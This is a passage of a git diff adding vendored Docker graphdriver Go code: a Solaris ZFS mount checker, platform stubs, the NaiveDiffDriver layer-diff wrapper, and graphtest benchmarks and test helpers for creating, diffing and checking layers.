filesystem. + FsNames = map[FsMagic]string{ + FsMagicZfs: "zfs", + } +) + +// GetFSMagic returns the filesystem id given the path. +func GetFSMagic(rootpath string) (FsMagic, error) { + return 0, nil +} + +type fsChecker struct { + t FsMagic +} + +func (c *fsChecker) IsMounted(path string) bool { + m, _ := Mounted(c.t, path) + return m +} + +// NewFsChecker returns a checker configured for the provied FsMagic +func NewFsChecker(t FsMagic) Checker { + return &fsChecker{ + t: t, + } +} + +// NewDefaultChecker returns a check that parses /proc/mountinfo to check +// if the specified path is mounted. +// No-op on Solaris. +func NewDefaultChecker() Checker { + return &defaultChecker{} +} + +type defaultChecker struct { +} + +func (c *defaultChecker) IsMounted(path string) bool { + m, _ := mount.Mounted(path) + return m +} + +// Mounted checks if the given path is mounted as the fs type +//Solaris supports only ZFS for now +func Mounted(fsType FsMagic, mountPath string) (bool, error) { + + cs := C.CString(filepath.Dir(mountPath)) + buf := C.getstatfs(cs) + + // on Solaris buf.f_basetype contains ['z', 'f', 's', 0 ... ] + if (buf.f_basetype[0] != 122) || (buf.f_basetype[1] != 102) || (buf.f_basetype[2] != 115) || + (buf.f_basetype[3] != 0) { + logrus.Debugf("[zfs] no zfs dataset found for rootdir '%s'", mountPath) + C.free(unsafe.Pointer(buf)) + return false, ErrPrerequisites + } + + C.free(unsafe.Pointer(buf)) + C.free(unsafe.Pointer(cs)) + return true, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go new file mode 100644 index 0000000000..4a875608b0 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_unsupported.go @@ -0,0 +1,15 @@ +// +build !linux,!windows,!freebsd,!solaris + +package graphdriver + +var ( + // Slice of drivers that should be used in an order + priority = []string{ + "unsupported", + } +) + +// GetFSMagic returns the filesystem id given the path. +func GetFSMagic(rootpath string) (FsMagic, error) { + return FsMagicUnsupported, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go new file mode 100644 index 0000000000..ffd30c2950 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/driver_windows.go @@ -0,0 +1,14 @@ +package graphdriver + +var ( + // Slice of drivers that should be used in order + priority = []string{ + "windowsfilter", + } +) + +// GetFSMagic returns the filesystem id given the path. +func GetFSMagic(rootpath string) (FsMagic, error) { + // Note it is OK to return FsMagicUnsupported on Windows. + return FsMagicUnsupported, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go b/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go new file mode 100644 index 0000000000..20826cd7d2 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/fsdiff.go @@ -0,0 +1,169 @@ +package graphdriver + +import ( + "io" + "time" + + "github.com/Sirupsen/logrus" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/chrootarchive" + "github.com/docker/docker/pkg/idtools" + "github.com/docker/docker/pkg/ioutils" +) + +var ( + // ApplyUncompressedLayer defines the unpack method used by the graph + // driver. + ApplyUncompressedLayer = chrootarchive.ApplyUncompressedLayer +) + +// NaiveDiffDriver takes a ProtoDriver and adds the +// capability of the Diffing methods which it may or may not +// support on its own. See the comment on the exported +// NewNaiveDiffDriver function below. +// Notably, the AUFS driver doesn't need to be wrapped like this. +type NaiveDiffDriver struct { + ProtoDriver + uidMaps []idtools.IDMap + gidMaps []idtools.IDMap +} + +// NewNaiveDiffDriver returns a fully functional driver that wraps the +// given ProtoDriver and adds the capability of the following methods which +// it may or may not support on its own: +// Diff(id, parent string) (archive.Archive, error) +// Changes(id, parent string) ([]archive.Change, error) +// ApplyDiff(id, parent string, diff archive.Reader) (size int64, err error) +// DiffSize(id, parent string) (size int64, err error) +func NewNaiveDiffDriver(driver ProtoDriver, uidMaps, gidMaps []idtools.IDMap) Driver { + return &NaiveDiffDriver{ProtoDriver: driver, + uidMaps: uidMaps, + gidMaps: gidMaps} +} + +// Diff produces an archive of the changes between the specified +// layer and its parent layer which may be "". +func (gdw *NaiveDiffDriver) Diff(id, parent string) (arch io.ReadCloser, err error) { + startTime := time.Now() + driver := gdw.ProtoDriver + + layerFs, err := driver.Get(id, "") + if err != nil { + return nil, err + } + + defer func() { + if err != nil { + driver.Put(id) + } + }() + + if parent == "" { + archive, err := archive.Tar(layerFs, archive.Uncompressed) + if err != nil { + return nil, err + } + return ioutils.NewReadCloserWrapper(archive, func() error { + err := archive.Close() + driver.Put(id) + return err + }), nil + } + + parentFs, err := driver.Get(parent, "") + if err != nil { + return nil, err + } + defer driver.Put(parent) + + changes, err := archive.ChangesDirs(layerFs, parentFs) + if err != nil { + return nil, err + } + + archive, err := archive.ExportChanges(layerFs, changes, gdw.uidMaps, gdw.gidMaps) + if err != nil { + return nil, err + } + + return ioutils.NewReadCloserWrapper(archive, func() error { + err := archive.Close() + driver.Put(id) + + // NaiveDiffDriver compares file metadata with parent layers. Parent layers + // are extracted from tar's with full second precision on modified time. + // We need this hack here to make sure calls within same second receive + // correct result. + time.Sleep(startTime.Truncate(time.Second).Add(time.Second).Sub(time.Now())) + return err + }), nil +} + +// Changes produces a list of changes between the specified layer +// and its parent layer. If parent is "", then all changes will be ADD changes. +func (gdw *NaiveDiffDriver) Changes(id, parent string) ([]archive.Change, error) { + driver := gdw.ProtoDriver + + layerFs, err := driver.Get(id, "") + if err != nil { + return nil, err + } + defer driver.Put(id) + + parentFs := "" + + if parent != "" { + parentFs, err = driver.Get(parent, "") + if err != nil { + return nil, err + } + defer driver.Put(parent) + } + + return archive.ChangesDirs(layerFs, parentFs) +} + +// ApplyDiff extracts the changeset from the given diff into the +// layer with the specified id and parent, returning the size of the +// new layer in bytes. +func (gdw *NaiveDiffDriver) ApplyDiff(id, parent string, diff io.Reader) (size int64, err error) { + driver := gdw.ProtoDriver + + // Mount the root filesystem so we can apply the diff/layer. + layerFs, err := driver.Get(id, "") + if err != nil { + return + } + defer driver.Put(id) + + options := &archive.TarOptions{UIDMaps: gdw.uidMaps, + GIDMaps: gdw.gidMaps} + start := time.Now().UTC() + logrus.Debug("Start untar layer") + if size, err = ApplyUncompressedLayer(layerFs, diff, options); err != nil { + return + } + logrus.Debugf("Untar time: %vs", time.Now().UTC().Sub(start).Seconds()) + + return +} + +// DiffSize calculates the changes between the specified layer +// and its parent and returns the size in bytes of the changes +// relative to its base filesystem directory. +func (gdw *NaiveDiffDriver) DiffSize(id, parent string) (size int64, err error) { + driver := gdw.ProtoDriver + + changes, err := gdw.Changes(id, parent) + if err != nil { + return + } + + layerFs, err := driver.Get(id, "") + if err != nil { + return + } + defer driver.Put(id) + + return archive.ChangesSize(layerFs, changes), nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go new file mode 100644 index 0000000000..def822b9a1 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphbench_unix.go @@ -0,0 +1,259 @@ +// +build linux freebsd + +package graphtest + +import ( + "bytes" + "io" + "io/ioutil" + "path/filepath" + "testing" + + "github.com/docker/docker/pkg/stringid" +) + +// DriverBenchExists benchmarks calls to exist +func DriverBenchExists(b *testing.B, drivername string, driveroptions ...string) { + driver := GetDriver(b, drivername, driveroptions...) + defer PutDriver(b) + + base := stringid.GenerateRandomID() + + if err := driver.Create(base, "", nil); err != nil { + b.Fatal(err) + } + + b.ResetTimer() + for i := 0; i < b.N; i++ { + if !driver.Exists(base) { + b.Fatal("Newly created image doesn't exist") + } + } +} + +// DriverBenchGetEmpty benchmarks calls to get on an empty layer +func DriverBenchGetEmpty(b *testing.B, drivername string, driveroptions ...string) { + driver := GetDriver(b, drivername, driveroptions...) + defer PutDriver(b) + + base := stringid.GenerateRandomID() + + if err := driver.Create(base, "", nil); err != nil { + b.Fatal(err) + } + + b.ResetTimer() + for i := 0; i < b.N; i++ { + _, err := driver.Get(base, "") + b.StopTimer() + if err != nil { + b.Fatalf("Error getting mount: %s", err) + } + if err := driver.Put(base); err != nil { + b.Fatalf("Error putting mount: %s", err) + } + b.StartTimer() + } +} + +// DriverBenchDiffBase benchmarks calls to diff on a root layer +func DriverBenchDiffBase(b *testing.B, drivername string, driveroptions ...string) { + driver := GetDriver(b, drivername, driveroptions...) + defer PutDriver(b) + + base := stringid.GenerateRandomID() + if err := driver.Create(base, "", nil); err != nil { + b.Fatal(err) + } + + if err := addFiles(driver, base, 3); err != nil { + b.Fatal(err) + } + + b.ResetTimer() + for i := 0; i < b.N; i++ { + arch, err := driver.Diff(base, "") + if err != nil { + b.Fatal(err) + } + _, err = io.Copy(ioutil.Discard, arch) + if err != nil { + b.Fatalf("Error copying archive: %s", err) + } + arch.Close() + } +} + +// DriverBenchDiffN benchmarks calls to diff on two layers with +// a provided number of files on the lower and upper layers. +func DriverBenchDiffN(b *testing.B, bottom, top int, drivername string, driveroptions ...string) { + driver := GetDriver(b, drivername, driveroptions...) + defer PutDriver(b) + base := stringid.GenerateRandomID() + upper := stringid.GenerateRandomID() + if err := driver.Create(base, "", nil); err != nil { + b.Fatal(err) + } + + if err := addManyFiles(driver, base, bottom, 3); err != nil { + b.Fatal(err) + } + + if err := driver.Create(upper, base, nil); err != nil { + b.Fatal(err) + } + + if err := addManyFiles(driver, upper, top, 6); err != nil { + b.Fatal(err) + } + b.ResetTimer() + for i := 0; i < b.N; i++ { + arch, err := driver.Diff(upper, "") + if err != nil { + b.Fatal(err) + } + _, err = io.Copy(ioutil.Discard, arch) + if err != nil { + b.Fatalf("Error copying archive: %s", err) + } + arch.Close() + } +} + +// DriverBenchDiffApplyN benchmarks calls to diff and apply together +func DriverBenchDiffApplyN(b *testing.B, fileCount int, drivername string, driveroptions ...string) { + driver := GetDriver(b, drivername, driveroptions...) + defer PutDriver(b) + base := stringid.GenerateRandomID() + upper := stringid.GenerateRandomID() + if err := driver.Create(base, "", nil); err != nil { + b.Fatal(err) + } + + if err := addManyFiles(driver, base, fileCount, 3); err != nil { + b.Fatal(err) + } + + if err := driver.Create(upper, base, nil); err != nil { + b.Fatal(err) + } + + if err := addManyFiles(driver, upper, fileCount, 6); err != nil { + b.Fatal(err) + } + diffSize, err := driver.DiffSize(upper, "") + if err != nil { + b.Fatal(err) + } + b.ResetTimer() + b.StopTimer() + for i := 0; i < b.N; i++ { + diff := stringid.GenerateRandomID() + if err := driver.Create(diff, base, nil); err != nil { + b.Fatal(err) + } + + if err := checkManyFiles(driver, diff, fileCount, 3); err != nil { + b.Fatal(err) + } + + b.StartTimer() + + arch, err := driver.Diff(upper, "") + if err != nil { + b.Fatal(err) + } + + applyDiffSize, err := driver.ApplyDiff(diff, "", arch) + if err != nil { + b.Fatal(err) + } + + b.StopTimer() + arch.Close() + + if applyDiffSize != diffSize { + // TODO: enforce this + //b.Fatalf("Apply diff size different, got %d, expected %s", applyDiffSize, diffSize) + } + if err := checkManyFiles(driver, diff, fileCount, 6); err != nil { + b.Fatal(err) + } + } +} + +// DriverBenchDeepLayerDiff benchmarks calls to diff on top of a given number of layers. +func DriverBenchDeepLayerDiff(b *testing.B, layerCount int, drivername string, driveroptions ...string) { + driver := GetDriver(b, drivername, driveroptions...) + defer PutDriver(b) + + base := stringid.GenerateRandomID() + if err := driver.Create(base, "", nil); err != nil { + b.Fatal(err) + } + + if err := addFiles(driver, base, 50); err != nil { + b.Fatal(err) + } + + topLayer, err := addManyLayers(driver, base, layerCount) + if err != nil { + b.Fatal(err) + } + + b.ResetTimer() + for i := 0; i < b.N; i++ { + arch, err := driver.Diff(topLayer, "") + if err != nil { + b.Fatal(err) + } + _, err = io.Copy(ioutil.Discard, arch) + if err != nil { + b.Fatalf("Error copying archive: %s", err) + } + arch.Close() + } +} + +// DriverBenchDeepLayerRead benchmarks calls to read a file under a given number of layers. +func DriverBenchDeepLayerRead(b *testing.B, layerCount int, drivername string, driveroptions ...string) { + driver := GetDriver(b, drivername, driveroptions...) + defer PutDriver(b) + + base := stringid.GenerateRandomID() + if err := driver.Create(base, "", nil); err != nil { + b.Fatal(err) + } + + content := []byte("test content") + if err := addFile(driver, base, "testfile.txt", content); err != nil { + b.Fatal(err) + } + + topLayer, err := addManyLayers(driver, base, layerCount) + if err != nil { + b.Fatal(err) + } + + root, err := driver.Get(topLayer, "") + if err != nil { + b.Fatal(err) + } + defer driver.Put(topLayer) + + b.ResetTimer() + for i := 0; i < b.N; i++ { + + // Read content + c, err := ioutil.ReadFile(filepath.Join(root, "testfile.txt")) + if err != nil { + b.Fatal(err) + } + + b.StopTimer() + if bytes.Compare(c, content) != 0 { + b.Fatalf("Wrong content in file %v, expected %v", c, content) + } + b.StartTimer() + } +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go new file mode 100644 index 0000000000..6e952de78b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_unix.go @@ -0,0 +1,358 @@ +// +build linux freebsd solaris + +package graphtest + +import ( + "bytes" + "io/ioutil" + "math/rand" + "os" + "path" + "reflect" + "syscall" + "testing" + "unsafe" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/stringid" + "github.com/docker/go-units" +) + +var ( + drv *Driver +) + +// Driver conforms to graphdriver.Driver interface and +// contains information such as root and reference count of the number of clients using it. +// This helps in testing drivers added into the framework. +type Driver struct { + graphdriver.Driver + root string + refCount int +} + +func newDriver(t testing.TB, name string, options []string) *Driver { + root, err := ioutil.TempDir("", "docker-graphtest-") + if err != nil { + t.Fatal(err) + } + + if err := os.MkdirAll(root, 0755); err != nil { + t.Fatal(err) + } + + d, err := graphdriver.GetDriver(name, nil, graphdriver.Options{DriverOptions: options, Root: root}) + if err != nil { + t.Logf("graphdriver: %v\n", err) + if err == graphdriver.ErrNotSupported || err == graphdriver.ErrPrerequisites || err == graphdriver.ErrIncompatibleFS { + t.Skipf("Driver %s not supported", name) + } + t.Fatal(err) + } + return &Driver{d, root, 1} +} + +func cleanup(t testing.TB, d *Driver) { + if err := drv.Cleanup(); err != nil { + t.Fatal(err) + } + os.RemoveAll(d.root) +} + +// GetDriver create a new driver with given name or return an existing driver with the name updating the reference count. +func GetDriver(t testing.TB, name string, options ...string) graphdriver.Driver { + if drv == nil { + drv = newDriver(t, name, options) + } else { + drv.refCount++ + } + return drv +} + +// PutDriver removes the driver if it is no longer used and updates the reference count. +func PutDriver(t testing.TB) { + if drv == nil { + t.Skip("No driver to put!") + } + drv.refCount-- + if drv.refCount == 0 { + cleanup(t, drv) + drv = nil + } +} + +// DriverTestCreateEmpty creates a new image and verifies it is empty and the right metadata +func DriverTestCreateEmpty(t testing.TB, drivername string, driverOptions ...string) { + driver := GetDriver(t, drivername, driverOptions...) + defer PutDriver(t) + + if err := driver.Create("empty", "", nil); err != nil { + t.Fatal(err) + } + + defer func() { + if err := driver.Remove("empty"); err != nil { + t.Fatal(err) + } + }() + + if !driver.Exists("empty") { + t.Fatal("Newly created image doesn't exist") + } + + dir, err := driver.Get("empty", "") + if err != nil { + t.Fatal(err) + } + + verifyFile(t, dir, 0755|os.ModeDir, 0, 0) + + // Verify that the directory is empty + fis, err := readDir(dir) + if err != nil { + t.Fatal(err) + } + + if len(fis) != 0 { + t.Fatal("New directory not empty") + } + + driver.Put("empty") +} + +// DriverTestCreateBase create a base driver and verify. +func DriverTestCreateBase(t testing.TB, drivername string, driverOptions ...string) { + driver := GetDriver(t, drivername, driverOptions...) + defer PutDriver(t) + + createBase(t, driver, "Base") + defer func() { + if err := driver.Remove("Base"); err != nil { + t.Fatal(err) + } + }() + verifyBase(t, driver, "Base") +} + +// DriverTestCreateSnap Create a driver and snap and verify. +func DriverTestCreateSnap(t testing.TB, drivername string, driverOptions ...string) { + driver := GetDriver(t, drivername, driverOptions...) + defer PutDriver(t) + + createBase(t, driver, "Base") + + defer func() { + if err := driver.Remove("Base"); err != nil { + t.Fatal(err) + } + }() + + if err := driver.Create("Snap", "Base", nil); err != nil { + t.Fatal(err) + } + + defer func() { + if err := driver.Remove("Snap"); err != nil { + t.Fatal(err) + } + }() + + verifyBase(t, driver, "Snap") +} + +// DriverTestDeepLayerRead reads a file from a lower layer under a given number of layers +func DriverTestDeepLayerRead(t testing.TB, layerCount int, drivername string, driverOptions ...string) { + driver := GetDriver(t, drivername, driverOptions...) + defer PutDriver(t) + + base := stringid.GenerateRandomID() + if err := driver.Create(base, "", nil); err != nil { + t.Fatal(err) + } + + content := []byte("test content") + if err := addFile(driver, base, "testfile.txt", content); err != nil { + t.Fatal(err) + } + + topLayer, err := addManyLayers(driver, base, layerCount) + if err != nil { + t.Fatal(err) + } + + err = checkManyLayers(driver, topLayer, layerCount) + if err != nil { + t.Fatal(err) + } + + if err := checkFile(driver, topLayer, "testfile.txt", content); err != nil { + t.Fatal(err) + } +} + +// DriverTestDiffApply tests diffing and applying produces the same layer +func DriverTestDiffApply(t testing.TB, fileCount int, drivername string, driverOptions ...string) { + driver := GetDriver(t, drivername, driverOptions...) + defer PutDriver(t) + base := stringid.GenerateRandomID() + upper := stringid.GenerateRandomID() + deleteFile := "file-remove.txt" + deleteFileContent := []byte("This file should get removed in upper!") + deleteDir := "var/lib" + + if err := driver.Create(base, "", nil); err != nil { + t.Fatal(err) + } + + if err := addManyFiles(driver, base, fileCount, 3); err != nil { + t.Fatal(err) + } + + if err := addFile(driver, base, deleteFile, deleteFileContent); err != nil { + t.Fatal(err) + } + + if err := addDirectory(driver, base, deleteDir); err != nil { + t.Fatal(err) + } + + if err := driver.Create(upper, base, nil); err != nil { + t.Fatal(err) + } + + if err := addManyFiles(driver, upper, fileCount, 6); err != nil { + t.Fatal(err) + } + + if err := removeAll(driver, upper, deleteFile, deleteDir); err != nil { + t.Fatal(err) + } + + diffSize, err := driver.DiffSize(upper, "") + if err != nil { + t.Fatal(err) + } + + diff := stringid.GenerateRandomID() + if err := driver.Create(diff, base, nil); err != nil { + t.Fatal(err) + } + + if err := checkManyFiles(driver, diff, fileCount, 3); err != nil { + t.Fatal(err) + } + + if err := checkFile(driver, diff, deleteFile, deleteFileContent); err != nil { + t.Fatal(err) + } + + arch, err := driver.Diff(upper, base) + if err != nil { + t.Fatal(err) + } + + buf := bytes.NewBuffer(nil) + if _, err := buf.ReadFrom(arch); err != nil { + t.Fatal(err) + } + if err := arch.Close(); err != nil { + t.Fatal(err) + } + + applyDiffSize, err := driver.ApplyDiff(diff, base, bytes.NewReader(buf.Bytes())) + if err != nil { + t.Fatal(err) + } + + if applyDiffSize != diffSize { + t.Fatalf("Apply diff size different, got %d, expected %d", applyDiffSize, diffSize) + } + + if err := checkManyFiles(driver, diff, fileCount, 6); err != nil { + t.Fatal(err) + } + + if err := checkFileRemoved(driver, diff, deleteFile); err != nil { + t.Fatal(err) + } + + if err := checkFileRemoved(driver, diff, deleteDir); err != nil { + t.Fatal(err) + } +} + +// DriverTestChanges tests computed changes on a layer matches changes made +func DriverTestChanges(t testing.TB, drivername string, driverOptions ...string) { + driver := GetDriver(t, drivername, driverOptions...) + defer PutDriver(t) + base := stringid.GenerateRandomID() + upper := stringid.GenerateRandomID() + if err := driver.Create(base, "", nil); err != nil { + t.Fatal(err) + } + + if err := addManyFiles(driver, base, 20, 3); err != nil { + t.Fatal(err) + } + + if err := driver.Create(upper, base, nil); err != nil { + t.Fatal(err) + } + + expectedChanges, err := changeManyFiles(driver, upper, 20, 6) + if err != nil { + t.Fatal(err) + } + + changes, err := driver.Changes(upper, base) + if err != nil { + t.Fatal(err) + } + + if err = checkChanges(expectedChanges, changes); err != nil { + t.Fatal(err) + } +} + +func writeRandomFile(path string, size uint64) error { + buf := make([]int64, size/8) + + r := rand.NewSource(0) + for i := range buf { + buf[i] = r.Int63() + } + + // Cast to []byte + header := *(*reflect.SliceHeader)(unsafe.Pointer(&buf)) + header.Len *= 8 + header.Cap *= 8 + data := *(*[]byte)(unsafe.Pointer(&header)) + + return ioutil.WriteFile(path, data, 0700) +} + +// DriverTestSetQuota Create a driver and test setting quota. +func DriverTestSetQuota(t *testing.T, drivername string) { + driver := GetDriver(t, drivername) + defer PutDriver(t) + + createBase(t, driver, "Base") + createOpts := &graphdriver.CreateOpts{} + createOpts.StorageOpt = make(map[string]string, 1) + createOpts.StorageOpt["size"] = "50M" + if err := driver.Create("zfsTest", "Base", createOpts); err != nil { + t.Fatal(err) + } + + mountPath, err := driver.Get("zfsTest", "") + if err != nil { + t.Fatal(err) + } + + quota := uint64(50 * units.MiB) + err = writeRandomFile(path.Join(mountPath, "file"), quota*2) + if pathError, ok := err.(*os.PathError); ok && pathError.Err != syscall.EDQUOT { + t.Fatalf("expect write() to fail with %v, got %v", syscall.EDQUOT, err) + } + +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go new file mode 100644 index 0000000000..a50c5211e3 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/graphtest_windows.go @@ -0,0 +1 @@ +package graphtest diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go new file mode 100644 index 0000000000..35bf6d17ba --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil.go @@ -0,0 +1,342 @@ +package graphtest + +import ( + "bytes" + "fmt" + "io/ioutil" + "math/rand" + "os" + "path" + "sort" + + "github.com/docker/docker/daemon/graphdriver" + "github.com/docker/docker/pkg/archive" + "github.com/docker/docker/pkg/stringid" +) + +func randomContent(size int, seed int64) []byte { + s := rand.NewSource(seed) + content := make([]byte, size) + + for i := 0; i < len(content); i += 7 { + val := s.Int63() + for j := 0; i+j < len(content) && j < 7; j++ { + content[i+j] = byte(val) + val >>= 8 + } + } + + return content +} + +func addFiles(drv graphdriver.Driver, layer string, seed int64) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + if err := ioutil.WriteFile(path.Join(root, "file-a"), randomContent(64, seed), 0755); err != nil { + return err + } + if err := os.MkdirAll(path.Join(root, "dir-b"), 0755); err != nil { + return err + } + if err := ioutil.WriteFile(path.Join(root, "dir-b", "file-b"), randomContent(128, seed+1), 0755); err != nil { + return err + } + + return ioutil.WriteFile(path.Join(root, "file-c"), randomContent(128*128, seed+2), 0755) +} + +func checkFile(drv graphdriver.Driver, layer, filename string, content []byte) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + fileContent, err := ioutil.ReadFile(path.Join(root, filename)) + if err != nil { + return err + } + + if bytes.Compare(fileContent, content) != 0 { + return fmt.Errorf("mismatched file content %v, expecting %v", fileContent, content) + } + + return nil +} + +func addFile(drv graphdriver.Driver, layer, filename string, content []byte) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + return ioutil.WriteFile(path.Join(root, filename), content, 0755) +} + +func addDirectory(drv graphdriver.Driver, layer, dir string) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + return os.MkdirAll(path.Join(root, dir), 0755) +} + +func removeAll(drv graphdriver.Driver, layer string, names ...string) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + for _, filename := range names { + if err := os.RemoveAll(path.Join(root, filename)); err != nil { + return err + } + } + return nil +} + +func checkFileRemoved(drv graphdriver.Driver, layer, filename string) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + if _, err := os.Stat(path.Join(root, filename)); err == nil { + return fmt.Errorf("file still exists: %s", path.Join(root, filename)) + } else if !os.IsNotExist(err) { + return err + } + + return nil +} + +func addManyFiles(drv graphdriver.Driver, layer string, count int, seed int64) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + for i := 0; i < count; i += 100 { + dir := path.Join(root, fmt.Sprintf("directory-%d", i)) + if err := os.MkdirAll(dir, 0755); err != nil { + return err + } + for j := 0; i+j < count && j < 100; j++ { + file := path.Join(dir, fmt.Sprintf("file-%d", i+j)) + if err := ioutil.WriteFile(file, randomContent(64, seed+int64(i+j)), 0755); err != nil { + return err + } + } + } + + return nil +} + +func changeManyFiles(drv graphdriver.Driver, layer string, count int, seed int64) ([]archive.Change, error) { + root, err := drv.Get(layer, "") + if err != nil { + return nil, err + } + defer drv.Put(layer) + + changes := []archive.Change{} + for i := 0; i < count; i += 100 { + archiveRoot := fmt.Sprintf("/directory-%d", i) + if err := os.MkdirAll(path.Join(root, archiveRoot), 0755); err != nil { + return nil, err + } + for j := 0; i+j < count && j < 100; j++ { + if j == 0 { + changes = append(changes, archive.Change{ + Path: archiveRoot, + Kind: archive.ChangeModify, + }) + } + var change archive.Change + switch j % 3 { + // Update file + case 0: + change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d", i+j)) + change.Kind = archive.ChangeModify + if err := ioutil.WriteFile(path.Join(root, change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil { + return nil, err + } + // Add file + case 1: + change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d-%d", seed, i+j)) + change.Kind = archive.ChangeAdd + if err := ioutil.WriteFile(path.Join(root, change.Path), randomContent(64, seed+int64(i+j)), 0755); err != nil { + return nil, err + } + // Remove file + case 2: + change.Path = path.Join(archiveRoot, fmt.Sprintf("file-%d", i+j)) + change.Kind = archive.ChangeDelete + if err := os.Remove(path.Join(root, change.Path)); err != nil { + return nil, err + } + } + changes = append(changes, change) + } + } + + return changes, nil +} + +func checkManyFiles(drv graphdriver.Driver, layer string, count int, seed int64) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + for i := 0; i < count; i += 100 { + dir := path.Join(root, fmt.Sprintf("directory-%d", i)) + for j := 0; i+j < count && j < 100; j++ { + file := path.Join(dir, fmt.Sprintf("file-%d", i+j)) + fileContent, err := ioutil.ReadFile(file) + if err != nil { + return err + } + + content := randomContent(64, seed+int64(i+j)) + + if bytes.Compare(fileContent, content) != 0 { + return fmt.Errorf("mismatched file content %v, expecting %v", fileContent, content) + } + } + } + + return nil +} + +type changeList []archive.Change + +func (c changeList) Less(i, j int) bool { + if c[i].Path == c[j].Path { + return c[i].Kind < c[j].Kind + } + return c[i].Path < c[j].Path +} +func (c changeList) Len() int { return len(c) } +func (c changeList) Swap(i, j int) { c[j], c[i] = c[i], c[j] } + +func checkChanges(expected, actual []archive.Change) error { + if len(expected) != len(actual) { + return fmt.Errorf("unexpected number of changes, expected %d, got %d", len(expected), len(actual)) + } + sort.Sort(changeList(expected)) + sort.Sort(changeList(actual)) + + for i := range expected { + if expected[i] != actual[i] { + return fmt.Errorf("unexpected change, expecting %v, got %v", expected[i], actual[i]) + } + } + + return nil +} + +func addLayerFiles(drv graphdriver.Driver, layer, parent string, i int) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + if err := ioutil.WriteFile(path.Join(root, "top-id"), []byte(layer), 0755); err != nil { + return err + } + layerDir := path.Join(root, fmt.Sprintf("layer-%d", i)) + if err := os.MkdirAll(layerDir, 0755); err != nil { + return err + } + if err := ioutil.WriteFile(path.Join(layerDir, "layer-id"), []byte(layer), 0755); err != nil { + return err + } + if err := ioutil.WriteFile(path.Join(layerDir, "parent-id"), []byte(parent), 0755); err != nil { + return err + } + + return nil +} + +func addManyLayers(drv graphdriver.Driver, baseLayer string, count int) (string, error) { + lastLayer := baseLayer + for i := 1; i <= count; i++ { + nextLayer := stringid.GenerateRandomID() + if err := drv.Create(nextLayer, lastLayer, nil); err != nil { + return "", err + } + if err := addLayerFiles(drv, nextLayer, lastLayer, i); err != nil { + return "", err + } + + lastLayer = nextLayer + + } + return lastLayer, nil +} + +func checkManyLayers(drv graphdriver.Driver, layer string, count int) error { + root, err := drv.Get(layer, "") + if err != nil { + return err + } + defer drv.Put(layer) + + layerIDBytes, err := ioutil.ReadFile(path.Join(root, "top-id")) + if err != nil { + return err + } + + if bytes.Compare(layerIDBytes, []byte(layer)) != 0 { + return fmt.Errorf("mismatched file content %v, expecting %v", layerIDBytes, []byte(layer)) + } + + for i := count; i > 0; i-- { + layerDir := path.Join(root, fmt.Sprintf("layer-%d", i)) + + thisLayerIDBytes, err := ioutil.ReadFile(path.Join(layerDir, "layer-id")) + if err != nil { + return err + } + if bytes.Compare(thisLayerIDBytes, layerIDBytes) != 0 { + return fmt.Errorf("mismatched file content %v, expecting %v", thisLayerIDBytes, layerIDBytes) + } + layerIDBytes, err = ioutil.ReadFile(path.Join(layerDir, "parent-id")) + if err != nil { + return err + } + } + return nil +} + +// readDir reads a directory just like ioutil.ReadDir() +// then hides specific files (currently "lost+found") +// so the tests don't "see" it +func readDir(dir string) ([]os.FileInfo, error) { + a, err := ioutil.ReadDir(dir) + if err != nil { + return nil, err + } + + b := a[:0] + for _, x := range a { + if x.Name() != "lost+found" { // ext4 always have this dir + b = append(b, x) + } + } + + return b, nil +} diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go new file mode 100644 index 0000000000..49b0c2cc35 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/graphdriver/graphtest/testutil_unix.go @@ -0,0 +1,143 @@ +// +build linux freebsd + +package graphtest + +import ( + "fmt" + "io/ioutil" + "os" + "path" + "syscall" + "testing" + + 